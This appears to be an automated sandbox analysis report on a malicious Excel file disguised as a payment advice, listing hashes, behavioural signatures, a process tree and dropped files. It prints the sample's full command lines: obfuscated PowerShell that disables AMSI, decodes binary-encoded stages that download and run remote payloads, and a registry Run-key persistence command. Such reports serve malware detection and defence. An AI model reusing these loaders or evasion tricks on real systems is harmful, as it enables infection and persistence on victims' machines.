Analysis
- max time kernel: 148s
- max time network: 152s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 11-05-2021 20:19

Static task: static1
Behavioral task: behavioral1
- Sample: Payment Advice_00152021.xls
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: Payment Advice_00152021.xls
- Resource: win10v20210408
General
- Target: Payment Advice_00152021.xls
- Size: 232KB
- MD5: 20af1905935afccb0f520bf165eec2f8
- SHA1: 5c3c15e2cc26401aaa0c4ca13b66423ab91002e6
- SHA256: 8837feb2649d365d8eee6f63c53585625f56ee7439d0cf6502e686215ac21b99
- SHA512: b5a711b7db8effc1aa5e72a6d03188ffb88981f7e964b94007ae663afe6c969686f3c669939d5475e3ae5e2ec512bfbc37722d26108c23296e19541638e18c2b
Malware Config
Signatures
- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3780 | 624 | powershell.exe | EXCEL.EXE
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow | pid | process
    28 | 3780 | powershell.exe
    31 | 4052 | powershell.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\lol = "C:\\Users\\Admin\\AppData\\Roaming\\mes.js" | reg.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
- Modifies registry class (1 IoCs)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings | powershell.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes:
    pid | process
    624 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes:
    pid | process
    3780 | powershell.exe
    3780 | powershell.exe
    3780 | powershell.exe
    4052 | powershell.exe
    4052 | powershell.exe
    4052 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (44 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 3780 | powershell.exe
    Token: SeDebugPrivilege | 4052 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 4052 | powershell.exe
    Token: SeSecurityPrivilege | 4052 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 4052 | powershell.exe
    Token: SeLoadDriverPrivilege | 4052 | powershell.exe
    Token: SeSystemProfilePrivilege | 4052 | powershell.exe
    Token: SeSystemtimePrivilege | 4052 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 4052 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 4052 | powershell.exe
    Token: SeCreatePagefilePrivilege | 4052 | powershell.exe
    Token: SeBackupPrivilege | 4052 | powershell.exe
    Token: SeRestorePrivilege | 4052 | powershell.exe
    Token: SeShutdownPrivilege | 4052 | powershell.exe
    Token: SeDebugPrivilege | 4052 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 4052 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 4052 | powershell.exe
    Token: SeUndockPrivilege | 4052 | powershell.exe
    Token: SeManageVolumePrivilege | 4052 | powershell.exe
    Token: 33 | 4052 | powershell.exe
    Token: 34 | 4052 | powershell.exe
    Token: 35 | 4052 | powershell.exe
    Token: 36 | 4052 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 4052 | powershell.exe
    Token: SeSecurityPrivilege | 4052 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 4052 | powershell.exe
    Token: SeLoadDriverPrivilege | 4052 | powershell.exe
    Token: SeSystemProfilePrivilege | 4052 | powershell.exe
    Token: SeSystemtimePrivilege | 4052 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 4052 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 4052 | powershell.exe
    Token: SeCreatePagefilePrivilege | 4052 | powershell.exe
    Token: SeBackupPrivilege | 4052 | powershell.exe
    Token: SeRestorePrivilege | 4052 | powershell.exe
    Token: SeShutdownPrivilege | 4052 | powershell.exe
    Token: SeDebugPrivilege | 4052 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 4052 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 4052 | powershell.exe
    Token: SeUndockPrivilege | 4052 | powershell.exe
    Token: SeManageVolumePrivilege | 4052 | powershell.exe
    Token: 33 | 4052 | powershell.exe
    Token: 34 | 4052 | powershell.exe
    Token: 35 | 4052 | powershell.exe
    Token: 36 | 4052 | powershell.exe
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes:
    pid | process
    624 | EXCEL.EXE (12 identical entries)
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
    description | pid | process | target process
    PID 624 wrote to memory of 3780 | 624 | EXCEL.EXE | powershell.exe
    PID 624 wrote to memory of 3780 | 624 | EXCEL.EXE | powershell.exe
    PID 3780 wrote to memory of 3748 | 3780 | powershell.exe | WScript.exe
    PID 3780 wrote to memory of 3748 | 3780 | powershell.exe | WScript.exe
    PID 3748 wrote to memory of 4052 | 3748 | WScript.exe | powershell.exe
    PID 3748 wrote to memory of 4052 | 3748 | WScript.exe | powershell.exe
    PID 3748 wrote to memory of 3840 | 3748 | WScript.exe | cmd.exe
    PID 3748 wrote to memory of 3840 | 3748 | WScript.exe | cmd.exe
    PID 3840 wrote to memory of 2888 | 3840 | cmd.exe | reg.exe
    PID 3840 wrote to memory of 2888 | 3840 | cmd.exe | reg.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Payment Advice_00152021.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils').GetField('a'+'ms'+'iI'+'nitFa'+'iled','Non#!'.replace('#!','Pub')+'lic,S'+'tatic');$yrtg.SetValue($null,$true);$g45gh6www=(00100100,01011010,00110001,00111101,00100111,00101000,01001110,01100101,01110111,00100111,00100000,00101011,00100000,00100111,00101101,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01011010,00110010,00111101,00100111,01100010,01000011,01101100,01101001,00100111,00100000,00101011,00100000,00100111,01100101,01101110,01110100,00101001,00101110,00100111,00101011,00100111,01000100,00100111,00101011,00100111,01101111,01110111,00100111,00101011,00100111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01011010,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01110110,01100101,01101110,01100100,01101111,01110010,01100011,01110010,01100101,01100100,01101001,01110100,01100111,01101100,01101111,01100010,01100001,01101100,00101110,01101111,01101110,01101100,01101001,01101110,01100101,00101111,01100110,01101001,01101110,01100100,00101111,01110110,01100001,01100111,01101001,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01000001,01010000,01010000,01000100,01000001,01010100,01000001,00101011,00100111,00100111,01011100,01101101,01100101,01110011,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01011000,01000011,00110001,00111101,01001001,01100000,01000101,01100000,01011000,00100000,00101000,00100100,01011010,00110001,00101100,00100100,01011010,00110010,00101100,00100100,01011010,00110011,00100000,001
01101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01000001,01010000,01010000,01000100,01000001,01010100,01000001,00101011,00100000,00100111,01011100,01101101,01100101,01110011,00101110,01101010,01110011,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$ggdfhsa=[system.String]::Join('', $g45gh6www);I`E`X($ggdfhsa)2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WScript.exe (depth 3)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mes.js"
  - Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,001001
11,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010
,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,01011011,01110110,01101111,01101001,01100100,01011101,00100000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,0
1101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01110110,01100101,01101110,01100100,01101111,01110010,01100011,01110010,01100101,01100100,01101001,01110100,01100111,01101100,01101111,01100010,01100001,01101100,00101110,01101111,01101110,01101100,01101001,01101110,01100101,00101111,01101110,01100001,01101110,00101111,01110100,01101111,01110000,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))4⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe (depth 4)
  Command line: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\mes.js"
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\reg.exe (depth 5)
  Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\mes.js"
  - Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: ea6243fdb2bfcca2211884b0a21a0afc
  SHA1: 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
  SHA256: 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
  SHA512: 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: bd2b8a354a656ae03fc25d435efbc4ae
  SHA1: 4ca8ab5c88b40a06ebf484d768956ae071d09143
  SHA256: 6f178ec12606cfae1dc46ad0af2ac21b7f88a087f9a1bbf301c74315535f9214
  SHA512: fff25739d5af57d7af51e52dab13e90b828e9658462b6acb85f617414b7e8a31f53a74653401dc3b3dafd0fcdf2b8ae2ab96465f595bec2b37f0f40b901eb401
- C:\Users\Admin\AppData\Roaming\mes.js
  MD5: 24e90355630964f5817bb14c94a61f82
  SHA1: 531dc7c73cdc6f76998518da17e2d6579b87dd42
  SHA256: ced7255e193ce0de7c6787a4e2f3e9b0059cdc7beac525cbc179148a9574bc9c
  SHA512: 18579437cfe17a015124143390a6ff6f2f5ff3d39bcdf4fffaba95c28a79b5d2a81c551d0fe7c2b89e1295e9610538ec7cbcd0782c76539f6fa7f9840150247b
- memory/624-117-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/624-118-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/624-119-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/624-122-0x00007FFCAC480000-0x00007FFCAD56E000-memory.dmp (Filesize: 16.9MB)
- memory/624-123-0x00007FFCAA580000-0x00007FFCAC475000-memory.dmp (Filesize: 31.0MB)
- memory/624-116-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/624-114-0x00007FF7E8160000-0x00007FF7EB716000-memory.dmp (Filesize: 53.7MB)
- memory/624-115-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/2888-189-0x0000000000000000-mapping.dmp
- memory/3748-183-0x0000000000000000-mapping.dmp
- memory/3780-181-0x000002AC3F843000-0x000002AC3F845000-memory.dmp (Filesize: 8KB)
- memory/3780-182-0x000002AC3F846000-0x000002AC3F848000-memory.dmp (Filesize: 8KB)
- memory/3780-180-0x000002AC3F840000-0x000002AC3F842000-memory.dmp (Filesize: 8KB)
- memory/3780-179-0x0000000000000000-mapping.dmp
- memory/3840-186-0x0000000000000000-mapping.dmp
- memory/4052-185-0x0000000000000000-mapping.dmp
- memory/4052-191-0x0000019FA31A3000-0x0000019FA31A5000-memory.dmp (Filesize: 8KB)
- memory/4052-190-0x0000019FA31A0000-0x0000019FA31A2000-memory.dmp (Filesize: 8KB)
- memory/4052-192-0x0000019FA31A6000-0x0000019FA31A8000-memory.dmp (Filesize: 8KB)